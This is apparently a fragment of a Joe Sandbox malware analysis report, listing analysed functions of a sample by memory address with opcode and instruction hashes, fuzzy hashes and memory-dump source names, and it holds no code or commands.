                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                    • Instruction ID: 1ece315647c04472ff7dab3933dbe33d7131eceee980c4bca4971955dfdbd5dd
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                    • Instruction Fuzzy Hash: 10C04C40F1F28B6AE73122E408E207C16905B66248B970576D5064A2E3DC8C6A065351
                                                                                                                                                                    Function 00007FFD9BE31671 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 304cb87df5bb0fa09ca4b9a65d4ec17989edd8592238712bad568bee1094c261
                                                                                                                                                                    • Instruction ID: 9cc66a614309190c872b9465f22f428e25615ce12b74c113b82570d5da6dbf0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 304cb87df5bb0fa09ca4b9a65d4ec17989edd8592238712bad568bee1094c261
                                                                                                                                                                    • Instruction Fuzzy Hash: 13B00200F0F70B97F63519F4087517D00450B452C5E570A39D51B461FBDD9E7E401556
                                                                                                                                                                    Function 00007FFD9BE39143 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                    • Instruction ID: 519be365e43cd35bf11335b26637b967e5d0524f8d9e56c0f1c9dfb034176893
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                    • Instruction Fuzzy Hash: E6B01204F0E20B47F63810F004BC03C40590F8C341B170D30D10F452E3DD4E3A006150

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00007FFD9BA788FA Relevance: 6.5, Strings: 5, Instructions: 202COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: /_^$/_^$/_^$/_^$/_^
                                                                                                                                                                    • API String ID: 0-1932650824
                                                                                                                                                                    • Opcode ID: 799490f506952e85a93f9bc270ab5fb81998f13d6486346839d672047721db79
                                                                                                                                                                    • Instruction ID: 54b9d06f827449d31310dc13c6dd516484028aec49881ef386aed8d3bffefcca
                                                                                                                                                                    • Opcode Fuzzy Hash: 799490f506952e85a93f9bc270ab5fb81998f13d6486346839d672047721db79
                                                                                                                                                                    • Instruction Fuzzy Hash: 13513CA3F0F6994BE7219B699CF61E83F90EF11268B0D11B7D0988B1E3FD5566068342